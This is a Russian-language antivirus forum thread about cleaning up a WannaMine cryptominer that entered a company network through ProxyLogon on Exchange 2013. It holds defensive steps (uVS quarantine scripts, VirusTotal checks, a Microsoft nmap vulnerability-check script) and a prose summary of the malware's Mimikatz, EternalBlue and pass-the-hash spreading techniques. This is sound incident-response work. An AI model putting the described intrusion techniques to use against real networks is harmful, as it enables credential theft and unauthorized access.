Форум esetnod32.ru [тема: Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013] http://forum.esetnod32.ru Новое в теме Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013 форума на сайте Форум esetnod32.ru [forum.esetnod32.ru] ru http://backend.userland.com/rss2 Thu, 23 Apr 2026 02:33:33 +0300 Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013 Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013 ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065), Trojan.Win32.Generic, Trojan.Multi.GenAutorunReg.c, Trojan.Multi.GenAutorunWMI.a, PowerShellMulDrop.129 + PowerShellDownLoader.1452, HEUR:Trojan.Multi.GenAutorunSvc.ksws в форуме Обнаружение вредоносного кода и ложные срабатывания.
по сути инцидента с распространением майнера в корпоративной сети есть отличный апрельский отчет от INCIBE_CERT:

Это исследование предназначено для профессионалов в области ИТ и кибербезопасности, исследователей и технических аналитиков, заинтересованных в анализе и исследованиях такого типа угроз, а также администраторов ИТ-сетей и системных администраторов с целью своевременного обновления своих компьютеров и защиты их от этой угрозы.

кратное изложение:

3. Исходный файл -  многослойный обфусцированный и закодированный в base64 файл Powershell.
вектор входа (откуда) во время первого заражения неизвестен. (в нашем случае, понятно, что через уязвимость в MS Exchange Server 2013. После анализа было установлено, что это вредоносное ПО из семейства WannaMine, чья основная цель - криптомайнинг (использование пораженных машин для майнинга криптовалюты), который пытается распространиться по пораженной сети.

эта вредоносная программа состоит из нескольких компонент(артефактов) и имеет возможность извлекать учетные данные из уязвимых систем, используя Mimikatz, а также эксплуатарует уязвимость CVE-2017-01441, известной как EternalBlue, чтобы получить доступ к другим машинам в сети, где вы не можете сделать это с помощью учетных данных, полученных с помощью собственных механизмов удаленного выполнения в Windows. Атака частично безфайловая, чтобы обойти антивирус и программы сканирования, автоматический запуск в песочницах, так как он использует PowerShell, чтобы попытаться запустить все в объем памяти.

исходный файл:
int6.ps1   Дроппер, который осуществляет первоначальное заражение на каждой из пораженных машин.

"Funs" Этот артефакт представляет собой сценарий PowerShell, который содержит множество вспомогательных функций, и функциональность бокового движения.

«mimi»: Mimikatz Это двоичный файл Mimikatz, который выполняется путем отраженной инъекции, избегая таким образом записи на диск и используется для получения учетных данных системы.

«mon»: miner XMRig Это двоичный файл программного обеспечения XMRig, майнера криптовалюты с открытым исходным кодом. популярен в атаках криптоджекинга. Он работает в памяти с помощью PowerShell, поэтому что двоичный файл не записывается на диск.

WinRing0x64.sys Этот компонент является легальным и подписанным драйвером, используемым майнером XMRig, который позволяет настроить регистры MSR для оптимизации производительности майнинга. Известно, что этот драйвер содержит уязвимости, которые позволяют эскалацию привилегии.

mue.exe
Этот компонент записывается на диск во время заражения, и его задача - инжектировать полезную нагрузку в легальный процесс

"Sc": Shellcode EternalBlue. Этот компонент был идентифицирован как шелл-код для эксплуатации уязвимости. EternalBlue, и его задача - заразить новую машину WannaMine во время бокового движения.

Данная угроза способна выполнять следующие действия:

* Обойти интерфейс сканирования на наличие вредоносных программ (AMSI).
* Поддерживать устойчивость в системе, создав подписку на события WMI.
* Извлекать токены NTLM.
*Сканировать на наличие уязвимости EternalBlue.
* Распространение на другие системы с помощью EternalBlue.
* Распространение на другие системы путем удаленного выполнения WMI с функцией Pass-the-Hash.
* Распространение на другие системы путем удаленного выполнения SMB с помощью функции Pass-the-Hash.
* Установить программное обеспечение для добычи криптовалюты с безфайловым исполнением (PowerShell).
* Установить программное обеспечение для майнинга криптовалют путем инъекции (Process Hollowing)
* Изменить настройки Windows, чтобы оптимизировать производительность майнинга.
* Изменить настройки Windows для сохранения.
* Оставить систему в уязвимом состоянии с целью локального повышения привилегий
Estudio del an?lisis de WannaMine.pdf
14.09.2021 12:10:19, santy.]]> http://forum.esetnod32.ru/messages/forum6/topic16547/message113075/ http://forum.esetnod32.ru/messages/forum6/topic16547/message113075/ Tue, 14 Sep 2021 12:10:19 +0300 Обнаружение вредоносного кода и ложные срабатывания Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013 Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013 ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065), Trojan.Win32.Generic, Trojan.Multi.GenAutorunReg.c, Trojan.Multi.GenAutorunWMI.a, PowerShellMulDrop.129 + PowerShellDownLoader.1452, HEUR:Trojan.Multi.GenAutorunSvc.ksws в форуме Обнаружение вредоносного кода и ложные срабатывания.
можно подвести некоторые итоги:

1. файлы отправленные в вирлаб по прежнему на ВирусТоал чисты (хотя ответа по этому поводу от вирлабов нет)

2.  после блокировки на маршрутизаторе ip адресом, с которых были направлены запросы на сервер MS Exchange
   скрипт проверки на уязвимость Test-ProxyLogon.ps1 не показал новых атак на сервер
https://github.com/microsoft/CSS-Exchange/releases/latest/download/Test-ProxyLogon.ps1
хотя и показывает что уязвимость обнаружена.
[FILE ID=120264]
3. актуальный патч для "Exchange Server\V15\" установлен, но необходимо проверить логи установки, успешно было установлено актуальное кумулятивное обновление или нет.
Exchange Server 2013

В таблице этого раздела приведены номера сборок и общие даты выпуска всех версий Microsoft Exchange Server 2013.

Exchange Server 2013
Название продукта Дата выпуска Номер сборки
(краткий формат) Номер сборки
(длинный формат)
  Exchange Server 2013 CU23 Jul21SU 13 июля 2021 г. 15.0.1497.23 15.00.1497.023


4. так же можно проверить наличие уязвимости используя nmap и спец скрипт,
Latest stable release self-installer: nmap-7.92-setup.exe
https://nmap.org/download.html
+ скрипт, добавить в каталог скриптов nse для nmap
https://github.com/microsoft/CSS-Exchange/releases/latest/download/http-vuln-cve2021-26855.nse


====quote====
-- @usage
-- nmap -p <port> --script http-vuln-cve2021-26855 <target>
--
-- @output
-- PORT STATE SERVICE
-- 443/tcp open https
-- | http-vuln-cve2021-26855:
-- | VULNERABLE
-- | Exchange Server SSRF Vulnerability
-- | State: VULNERABLE
-- | IDs: CVE:CVE-2021-26855
-- |
-- | Disclosure date: 2021-03-02
-- | References:
-- | http://aka.ms/exchangevulns
--
-- @args http-vuln-cve2021-26855.method The HTTP method for the request. The default method is "GET".

=============

5. вопрос с регулярным детектированием (через каждые три часа) антивирусом группы вредоносных скриптом был решен
проверка задач по образу uVS из нормального режима и из под winpe ничего не показала.
внешние атаки не наблюдались;
по логу procmon в момент срабатывания антивируса была обнаружена активность касперского с регулярным обновлением. наступил час Сократа.
админы приняли решение очистить карантин, куда антивирус регулярно добавлял файлы каждые три часа.
после очистки карантина детекты прекратились. что это было? вопрос к знатокам.

6. собственно следующая задача - добиться централизованного управления и контроля через веб-консоль  по всем установленным антивирусных клиентам, и оперативная очистка возможно оставшихся неочищенными узлов.

рекомендуем для ознакомления:
ESET Protect
https://help.eset.com/protect_admin/81/ru-RU/

7. можно проверить в работе данную утилиту на предмет аудита по журналам.
Новый инструмент Chainsaw помогает командам IR анализировать журналы событий Windows
https://github.com/countercept/chainsaw/releases/download/v1.0.2/chainsaw_x86_64-pc-windows-msvc.zip

12.09.2021 17:03:45, santy.]]> http://forum.esetnod32.ru/messages/forum6/topic16547/message113068/ http://forum.esetnod32.ru/messages/forum6/topic16547/message113068/ Sun, 12 Sep 2021 17:03:45 +0300 Обнаружение вредоносного кода и ложные срабатывания Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013 Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013 ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065), Trojan.Win32.Generic, Trojan.Multi.GenAutorunReg.c, Trojan.Multi.GenAutorunWMI.a, PowerShellMulDrop.129 + PowerShellDownLoader.1452, HEUR:Trojan.Multi.GenAutorunSvc.ksws в форуме Обнаружение вредоносного кода и ложные срабатывания.
ок, недетектируемые файлы из процесса W3WP.EXE ушли в вирлаб, ждет ответ
06.09.2021 06:13:21, santy.]]> http://forum.esetnod32.ru/messages/forum6/topic16547/message113044/ http://forum.esetnod32.ru/messages/forum6/topic16547/message113044/ Mon, 06 Sep 2021 06:13:21 +0300 Обнаружение вредоносного кода и ложные срабатывания Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013 Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013 ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065), Trojan.Win32.Generic, Trojan.Multi.GenAutorunReg.c, Trojan.Multi.GenAutorunWMI.a, PowerShellMulDrop.129 + PowerShellDownLoader.1452, HEUR:Trojan.Multi.GenAutorunSvc.ksws в форуме Обнаружение вредоносного кода и ложные срабатывания.

====quote====
santy написал:
malwarebytes
=============
Скачал, установил, просканировал, лог отправил на почту.
Криминала не обнаружил.
04.09.2021 18:38:05, Mr Burila.]]> http://forum.esetnod32.ru/messages/forum6/topic16547/message113042/ http://forum.esetnod32.ru/messages/forum6/topic16547/message113042/ Sat, 04 Sep 2021 18:38:05 +0300 Обнаружение вредоносного кода и ложные срабатывания Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013 Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013 ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065), Trojan.Win32.Generic, Trojan.Multi.GenAutorunReg.c, Trojan.Multi.GenAutorunWMI.a, PowerShellMulDrop.129 + PowerShellDownLoader.1452, HEUR:Trojan.Multi.GenAutorunSvc.ksws в форуме Обнаружение вредоносного кода и ложные срабатывания.
ок, смотрю,


ссылка на malwarebytes
https://forum.esetnod32.ru/forum9/topic10688/

ссылка на скачивание:
http://www.malwarebytes.org/mwb-download/
04.09.2021 18:04:20, santy.]]> http://forum.esetnod32.ru/messages/forum6/topic16547/message113041/ http://forum.esetnod32.ru/messages/forum6/topic16547/message113041/ Sat, 04 Sep 2021 18:04:20 +0300 Обнаружение вредоносного кода и ложные срабатывания Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013 Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013 ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065), Trojan.Win32.Generic, Trojan.Multi.GenAutorunReg.c, Trojan.Multi.GenAutorunWMI.a, PowerShellMulDrop.129 + PowerShellDownLoader.1452, HEUR:Trojan.Multi.GenAutorunSvc.ksws в форуме Обнаружение вредоносного кода и ложные срабатывания.

====quote====
santy написал:
через uVS включить запись DNS лога
=============
отправил на почту
04.09.2021 17:56:52, Mr Burila.]]> http://forum.esetnod32.ru/messages/forum6/topic16547/message113040/ http://forum.esetnod32.ru/messages/forum6/topic16547/message113040/ Sat, 04 Sep 2021 17:56:52 +0300 Обнаружение вредоносного кода и ложные срабатывания Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013 Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013 ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065), Trojan.Win32.Generic, Trojan.Multi.GenAutorunReg.c, Trojan.Multi.GenAutorunWMI.a, PowerShellMulDrop.129 + PowerShellDownLoader.1452, HEUR:Trojan.Multi.GenAutorunSvc.ksws в форуме Обнаружение вредоносного кода и ложные срабатывания.

====quote====
santy написал:
через uVS включить запись DNS лога
=============
Запись лога включена.
Ждём.
04.09.2021 17:11:51, Mr Burila.]]> http://forum.esetnod32.ru/messages/forum6/topic16547/message113039/ http://forum.esetnod32.ru/messages/forum6/topic16547/message113039/ Sat, 04 Sep 2021 17:11:51 +0300 Обнаружение вредоносного кода и ложные срабатывания Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013 Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013 ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065), Trojan.Win32.Generic, Trojan.Multi.GenAutorunReg.c, Trojan.Multi.GenAutorunWMI.a, PowerShellMulDrop.129 + PowerShellDownLoader.1452, HEUR:Trojan.Multi.GenAutorunSvc.ksws в форуме Обнаружение вредоносного кода и ложные срабатывания.
пробуйте через uVS включить запись DNS лога,
чтобы в образ попали вероятные ip адреса, с которых возможно идет атака на сервер.
это можно сделать в режиме uVS - alt+T (твики). 41 включить DNS лог
04.09.2021 16:49:12, santy.]]> http://forum.esetnod32.ru/messages/forum6/topic16547/message113038/ http://forum.esetnod32.ru/messages/forum6/topic16547/message113038/ Sat, 04 Sep 2021 16:49:12 +0300 Обнаружение вредоносного кода и ложные срабатывания Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013 Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013 ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065), Trojan.Win32.Generic, Trojan.Multi.GenAutorunReg.c, Trojan.Multi.GenAutorunWMI.a, PowerShellMulDrop.129 + PowerShellDownLoader.1452, HEUR:Trojan.Multi.GenAutorunSvc.ksws в форуме Обнаружение вредоносного кода и ложные срабатывания.

====quote====
Рабочий процесс информационных служб Интернета (IIS) - это windows процесс (w3wp.exe), который запускает веб-приложения и отвечает за обработку запросов, отправленных на веб-сервер для определенного пула приложений.

Это рабочий процесс для IIS. Каждый пул приложений создает по крайней мере один экземпляр w3wp.exe , и именно он фактически обрабатывает запросы в вашем приложении

=============

собственно, видим, что
Полное имя                  C:\WINDOWS\SYSTEM32\INETSRV\W3WP.EXE
Имя файла                   W3WP.EXE
Тек. статус                 АКТИВНЫЙ ПРОВЕРЕННЫЙ [СЕТЕВАЯ_АКТИВНОСТЬ]
                           
Цифр. подпись               Действительна, подписано Microsoft Windows
Загруженные DLL             НЕИЗВЕСТНЫЕ
====code==== 
APP_BROWSERS.CM1GY-YR.DLL   C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A
APP_GLOBAL.ASAX.9ROHC7PQ.DLLC:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A
APP_GLOBAL.ASAX.B43PI4NY.DLLC:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\RPC\296C8D2F\5A4276D8
APP_GLOBAL.ASAX.CQHP4HAL.DLLC:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\AUTODISCOVER\1E0EBF5E\81BBFD0C
APP_GLOBAL.ASAX.F82CQ-3M.DLLC:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\EWS\82CED47D\9F9837FE
APP_GLOBAL.ASAX.FJON4ZRX.DLLC:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\OWA_CALENDAR\50586ABB\43FE3563
APP_GLOBAL.ASAX.GFOSMOYG.DLLC:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\MAPI\236CA80D\613D0742
APP_GLOBAL.ASAX.LOVEIRWB.DLLC:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\AUTODISCOVER\B455E468\CBAAC37D
APP_GLOBAL.ASAX.N3CT8VNU.DLLC:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\OWA\8E05B027\E164D61B
APP_GLOBAL.ASAX.P7BTXYGD.DLLC:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\OWA\F1907565\9FA11D9F
APP_GLOBAL.ASAX.QXTXGCN5.DLLC:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\OAB\5A665F22\C3DD660B
APP_GLOBAL.ASAX.RGDBHA8I.DLLC:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\EWS\9BF2358A\E86A63DA
APP_GLOBAL.ASAX.T_-RLTDU.DLLC:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\MAPI_EMSMDB\FF130E68\58BD4667
APP_GLOBAL.ASAX.VOPJ5BFR.DLLC:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\POWERSHELL\788CBAD3\5ED4F687
APP_GLOBAL.ASAX.ZIGCDRV_.DLLC:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\1CD810A3\710C31B6
APP_THEME_DEFAULT._PA_PVFA.DLLC:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A
APP_WEB_0EXSSJHG.DLL        C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A
APP_WEB_2X1TGTE0.DLL        C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A
APP_WEB_2ZYUFYVK.DLL        C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A
APP_WEB_BZJN21B2.DLL        C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A
APP_WEB_DPLFNAEX.DLL        C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A
APP_WEB_FHHKYG34.DLL        C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A
APP_WEB_FRZ2LSJQ.DLL        C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A
APP_WEB_HHL3EFGE.DLL        C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A
APP_WEB_LUOS5NMH.DLL        C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A
APP_WEB_MT1YTSHN.DLL        C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A
APP_WEB_O5BJKYBG.DLL        C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\OWA\8E05B027\E164D61B
APP_WEB_OCV4TGXS.DLL        C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A
APP_WEB_QDEJ0KXZ.DLL        C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A
APP_WEB_WKYXHA1V.DLL        C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A
MSERVCLIENT.DLL             C:\PROGRAM FILES\MICROSOFT\EXCHANGE SERVER\V15\BIN
OSAFEHTM.DLL                C:\PROGRAM FILES\MICROSOFT\EXCHANGE SERVER\V15\BIN
                            
=============
04.09.2021 16:38:34, santy.]]> http://forum.esetnod32.ru/messages/forum6/topic16547/message113037/ http://forum.esetnod32.ru/messages/forum6/topic16547/message113037/ Sat, 04 Sep 2021 16:38:34 +0300 Обнаружение вредоносного кода и ложные срабатывания Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013 Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013 ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065), Trojan.Win32.Generic, Trojan.Multi.GenAutorunReg.c, Trojan.Multi.GenAutorunWMI.a, PowerShellMulDrop.129 + PowerShellDownLoader.1452, HEUR:Trojan.Multi.GenAutorunSvc.ksws в форуме Обнаружение вредоносного кода и ложные срабатывания.
линки проверки по некоторым файлам (никто не детектирует):

====code==== 
https://www.virustotal.com/gui/file/deb133c8f85c0708ebff915797dc3704e78e2adda5c9eae97a8c53a4135ddaff/detection
https://www.virustotal.com/gui/file/6588c802ec136a166f92396bb51c9ebe69719da6910d3f7ff40c333e3ea0ea98/detection
https://www.virustotal.com/gui/file/e35ed505119a886d545f3210c74962c535e0d0e1591fdd5a9d13b3f56443b723/detection
https://www.virustotal.com/gui/file/63039acdb05c5e4ce1c6a65bca22055452b4634e5df582b8436c844bf9019186/detection
https://www.virustotal.com/gui/file/9c761e20613137cedd320d9f4c88c65d0ef2aeac8661aecac9d0a95db02c5d77/detection
https://www.virustotal.com/gui/file/deb133c8f85c0708ebff915797dc3704e78e2adda5c9eae97a8c53a4135ddaff/detection
https://www.virustotal.com/gui/file/4aa37c55df8c1fde0f5c332d19b0ebb22db79f93e90e94fbb7bc02e991666395/detection
https://www.virustotal.com/gui/file/6588c802ec136a166f92396bb51c9ebe69719da6910d3f7ff40c333e3ea0ea98/detection
https://www.virustotal.com/gui/file/345862e88e8b47d20c559f6ac372f868656835f0647d15c435d874094f0f8317/detection
https://www.virustotal.com/gui/file/c05515ef4226a9db4243dce236397478593748dfca1c2ffcccc0450f9d06037e/detection
https://www.virustotal.com/gui/file/7513547bebd3d83f1438167cb11819b0610a2f7a1f89804f978ae97ff029f0cb/detection
https://www.virustotal.com/gui/file/55b722732ab41905349d5344e2a434e96a5af145a09b8c5388f89c6a57111450/detection
https://www.virustotal.com/gui/file/f3b6290400e848294dc816d2376e77993492b3a7c819462501e1c195ac2e5bb0/detection
https://www.virustotal.com/gui/file/de0609ed07aa71419e8c7ca5c7e2ca6e70ce06b064337bc333725fd6fe28d4b3/detection
https://www.virustotal.com/gui/file/e35ed505119a886d545f3210c74962c535e0d0e1591fdd5a9d13b3f56443b723/detection
https://www.virustotal.com/gui/file/e9812f1c6bfff30ffbcda27811e1378ecd1d46cfa72a842dc709a82835d71037/detection

https://www.virustotal.com/gui/file-analysis/MmRmYjY2Yjc0ZWE0YjBjYWU3YWJkNDY1ZTkxNTRjYTE6MTYzMDc2MTk5NA==/detection
=============

пример файла:

====quote====
Полное имя                  C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_QDEJ0KXZ.DLL
Имя файла                   APP_WEB_QDEJ0KXZ.DLL
Тек. статус                 АКТИВНЫЙ DLL
                           
Сохраненная информация      на момент создания образа
Статус                      АКТИВНЫЙ DLL
File_Id                     6132493F28000
Linker                      11.0
Размер                      140288 байт
Создан                      03.09.2021 в 19:11:43
Изменен                     03.09.2021 в 19:11:44
                           
TimeStamp                   03.09.2021 в 16:11:43
EntryPoint                  +
OS Version                  4.0
Subsystem                   Windows character-mode user interface (CUI) subsystem
IMAGE_FILE_DLL              +
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   32-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Отсутствует либо ее не удалось проверить
                           
Доп. информация             на момент обновления списка
SHA1                        496888AF336F11C54580B8DA6178D639A1A1AF2A
MD5                         459A9B4D05142528E55B721C73E7C8CE
                           
Процессы                    на момент обновления списка
Процесс                     C:\WINDOWS\SYSTEM32\INETSRV\W3WP.EXE [16888]
                           
=============

надо понять, что это за файлы: свежие, без цифровой, загружены легитимным процессов
04.09.2021 16:27:30, santy.]]> http://forum.esetnod32.ru/messages/forum6/topic16547/message113036/ http://forum.esetnod32.ru/messages/forum6/topic16547/message113036/ Sat, 04 Sep 2021 16:27:30 +0300 Обнаружение вредоносного кода и ложные срабатывания Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013 Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013 ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065), Trojan.Win32.Generic, Trojan.Multi.GenAutorunReg.c, Trojan.Multi.GenAutorunWMI.a, PowerShellMulDrop.129 + PowerShellDownLoader.1452, HEUR:Trojan.Multi.GenAutorunSvc.ksws в форуме Обнаружение вредоносного кода и ложные срабатывания.

====quote====
santy написал:
архив из каталога uVS (по формату: ZOO_гггг-мм-дд_чч-мм-сс.rar/7z)  отправить в safety@chklst.ru
=============
Готово.
04.09.2021 16:14:22, Mr Burila.]]> http://forum.esetnod32.ru/messages/forum6/topic16547/message113035/ http://forum.esetnod32.ru/messages/forum6/topic16547/message113035/ Sat, 04 Sep 2021 16:14:22 +0300 Обнаружение вредоносного кода и ложные срабатывания Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013 Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013 ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065), Trojan.Win32.Generic, Trojan.Multi.GenAutorunReg.c, Trojan.Multi.GenAutorunWMI.a, PowerShellMulDrop.129 + PowerShellDownLoader.1452, HEUR:Trojan.Multi.GenAutorunSvc.ksws в форуме Обнаружение вредоносного кода и ложные срабатывания.
выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
====code==== 

;uVS v4.11.8 [http://dsrt.dyndns.org:8888]
;Target OS: NTv6.3
v400c
OFFSGNSAVE
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_BROWSERS.CM1GY-YR.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_GLOBAL.ASAX.9ROHC7PQ.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\RPC\296C8D2F\5A4276D8\APP_GLOBAL.ASAX.B43PI4NY.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\AUTODISCOVER\1E0EBF5E\81BBFD0C\APP_GLOBAL.ASAX.CQHP4HAL.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\EWS\82CED47D\9F9837FE\APP_GLOBAL.ASAX.F82CQ-3M.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\OWA_CALENDAR\50586ABB\43FE3563\APP_GLOBAL.ASAX.FJON4ZRX.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\MAPI\236CA80D\613D0742\APP_GLOBAL.ASAX.GFOSMOYG.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\AUTODISCOVER\B455E468\CBAAC37D\APP_GLOBAL.ASAX.LOVEIRWB.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\OWA\8E05B027\E164D61B\APP_GLOBAL.ASAX.N3CT8VNU.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\OWA\F1907565\9FA11D9F\APP_GLOBAL.ASAX.P7BTXYGD.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\OAB\5A665F22\C3DD660B\APP_GLOBAL.ASAX.QXTXGCN5.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\EWS\9BF2358A\E86A63DA\APP_GLOBAL.ASAX.RGDBHA8I.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\MAPI_EMSMDB\FF130E68\58BD4667\APP_GLOBAL.ASAX.T_-RLTDU.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\POWERSHELL\788CBAD3\5ED4F687\APP_GLOBAL.ASAX.VOPJ5BFR.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\1CD810A3\710C31B6\APP_GLOBAL.ASAX.ZIGCDRV_.DLL
